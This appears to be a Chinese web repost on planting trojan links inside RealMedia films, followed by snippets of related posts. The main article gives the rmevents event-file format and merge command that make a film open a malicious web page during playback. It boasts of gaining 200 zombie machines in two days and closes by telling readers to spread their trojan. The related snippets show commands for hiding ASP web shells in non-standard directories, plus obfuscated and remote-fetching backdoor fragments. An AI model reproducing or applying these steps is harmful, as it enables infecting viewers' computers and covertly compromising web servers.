在Real影片中放木马后门

在Real影片中放木马后门.遇到类是情况希望大家注意
经常遇到rm影片播放时弹出网页,一直不知道怎么回事,前几天看到了大众软件中一篇文章才知道插入和去除的方法,好东东不敢独享,在网上搜了三篇相关文章,转给大家拉! 
  在Real影片中放 木马 在P2P软件里,很多的Real影片都是危险的,这只是一个小技巧,辅助的一种入侵方式,但这种方法很有效果,比如在著名的A片交流软件PP点点通里,安装了一个这样的小木马 ,两天就有200个肉鸡,并且呈几何状增长.大家别做坏事。 使用某个工具来修改影片的剪辑信息,可以在指定时间打开指定的窗口. 
  新建一个文本文件rmevents.txt. 输入: u 00:01:00.0 00:01:30.0 http ://yjs.bit.edu.cn/bbs 我来解释一下,它意思是说在00:01:00.0 00:01:30.0这个时间范围内打开后面的URL,后面的URL就是我们的 木马 地址。 输入rmevents -i 电影 .rm -e rmevents.txt -o 电影 1.rm 这个命令,生成的 电影 .rm就是我们的 木马 文件了。 http ://yjs.bit.edu.cn/bbs 这个地址是你做好的网页 木马 的地址,不管是动鲨 木马 啊,还是EXE2BMP的 木马 ,还是什么CHM 木马 . 防御方法更简单,嘿嘿,不看 电影 就没事了。要不就不用Realpalyer看吧,换别的播放器。 
去除realoneplay里的网页问题 这个弹出的网页是由一开始压制影片的人压进去的广告页。可以通过刚才的哪个软件修改掉!!
  在准备个文本命令文件 文本命令如下 实例:在00:20.0(时分秒毫)—01:10.0时让欣赏者自动弹出 http ://yjs.bit.edu.cn/bbs 主页 在03:10.0(时分秒毫)—03:59.0时让欣赏者自动弹出 http ://yjs.bit.edu.cn/bbs 主页 1、编辑事件文件 新建一个记事本文件,命名为event.txt(可随意),输入以下内容: u 00:20.0 01:10.0 http ://yjs.bit.edu.cn/bbs u 03:10.0 03:59.0 http ://yjs.bit.edu.cn/bbs 存盘后退出 解释:u 表示URL事件, 00:20.0是起启时间,01:10.0是结束时间,后面是指定的网页. 
  下一步 将影片与网马合并,在弹出的对话框中选择刚才编辑的event.txt文件,确定后 开始合并事件,合并结束后,请将含有事件文件的RM文件另行保存。整个过程应当在15分钟以内完成,还是相当快的。 
剩下的就是把你的木马放入网络了!

(0)

相关推荐

  • 在Real影片中放木马后门

    在Real影片中放木马后门.遇到类是情况希望大家注意 经常遇到rm影片播放时弹出网页,一直不知道怎么回事,前几天看到了大众软件中一篇文章才知道插入和去除的方法,好东东不敢独享,在网上搜了三篇相关文章,转给大家拉!  在Real影片中放 木马 在P2P软件里,很多的Real影片都是危险的,这只是一个小技巧,辅助的一种入侵方式,但这种方法很有效果,比如在著名的A片交流软件PP点点通里,安装了一个这样的小木马 ,两天就有200个肉鸡,并且呈几何状增长.大家别做坏事. 使用某个工具来修改影片的剪辑信息,

  • 在线扫描探测检查asp站点木马后门的程序

    复制代码 代码如下: <%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <% '设置登陆密码,使用前务必修改此密码 PASSWORD = "www.pifoo.com" '其他扫描设置 DimFileExt = "asp,cer,asa,cdx"  '文件类型扩展名列表,不在此列表的将不被扫描 maxfilesize= 51200 '500K,超过此文件大小的文件(一般不是木马)

  • 隐藏ASP木马后门的两种方法

    1.建立非标准目录:mkdir images..\ 拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp 通过web访问ASP木马:http://ip/images../news.asp?action=login 如何删除非标准目录:rmdir images..\ /s 2.Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的: mkdir 

  • com1/lpt1/prn/nul 木马后门处理方法集合

    删除命令 rd /s \\.\E:\webhosting\wwwroot\prn.0418EE4F 复制代码 代码如下: <% 'by*aming dim amxml,amtxt,amado amtxt="h"&"t"&"t"&"p"&":"&"/"&"/"&"b"&"

  • ASP木马后门新思路

    <% Function GetPage(url) dim Retrieval Set Retrieval = createObject("Microsoft.XMLHTTP") With Retrieval .Open "Get", url, False ', "", "" .Send GetPage = BytesToBstr(.ResponseBody) End With Set Retrieval = Nothin

  • 一句话木马入侵EASYNEWS新闻管理系统

    实例一:"一句话木马"入侵"EASYNEWS新闻管理系统"      "EASYNEWS新闻管理系统 v1.01 正式版"是在企业网站中非常常见的一套整站模版,在该网站系统的留言本组件中就存在着数据过滤不严漏洞,如果网站是默认路径和默认文件名安装的话,入侵者可以利用该漏洞直接上传ASP木马程序控制整个网站服务器. Step1 搜索入侵目标 使用了"EASYNEWS新闻管理系统 v1.01 正式版"的网站,在网站页面的底部版权声

  • 服务器攻防站 网站后门防范及安全配置

    1.后门防范基本功 首先要关闭本机不用的端口或只允许指定的端口访问:其次要使用专杀木马的软件,为了有效地防范木马后门:第三是要学会对进程操作,时时注意系统运行状况,看看是否有一些不明进程正运行并及时地将不明进程终止掉. 2.安全配置Web服务器 如果公司或企业建立了主页,该如何保证自己的Web服务器的安全性呢? 首先要关闭不必要的服务:其次是建立安全账号策略和安全日志:第三是设置安全的IIS,删除不必要的IIS组件和进行IIS安全配置. 在IIS安全配置时候,要注意修改默认的"Inetpub&q

  • 记一次入侵Linux服务器和删除木马程序的经历

    一.背景 晚上看到有台服务器流量跑的很高,明显和平常不一样,流量达到了800Mbps,第一感觉应该是中木马了,被人当做肉鸡了,在大量发包. 我们的服务器为了最好性能,防火墙(iptables)什么的都没有开启,但是服务器前面有物理防火墙,而且机器都是做的端口映射,也不是常见的端口,按理来说应该是满安全的,可能最近和木马有缘吧,老是让我遇到,也趁这次机会把发现过程记录一下. 二.发现并追踪处理 1.查看流量图发现问题 查看的时候网页非常卡,有的时候甚至没有响应. 2.top动态查看进程 我马上远程

  • Windows服务器安全配置

    服务器安全配置(只针对WIN系统) 一. 原则关掉所有不使用的服务,不安装所有与服务器无关的软件,打好所有补丁 修改3389 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Wds\Repwd\Tds\Tcp, 看到那个PortNumber没有?0xd3d,这个是16进制,就是3389啦,我改XXXX这个值是RDP(远程桌面协议)的默认值,也就是说用来配置以后新建的RDP服务的,要改已经建立的RDP服务,我们

  • WEB专用服务器的安全设置

    IIS的相关设置:删除默认建立的站点的虚拟目录,停止默认web站点,删除对应的文件目录c:inetpub,配置所有站点的公共设置,设置好相关的连接数限制, 带宽设置以及性能设置等其他设置.配置应用程序映射,删除所有不必要的应用程序扩展,只保留asp,php,cgi,pl,aspx应用程序扩展.对 于php和cgi,推荐使用isapi方式解析,用exe解析对安全和性能有所影响.用户程序调试设置发送文本错误信息给客户.对于数据库,尽量采 用mdb后缀,不需要更改为asp,可在IIS中设置一个mdb的

随机推荐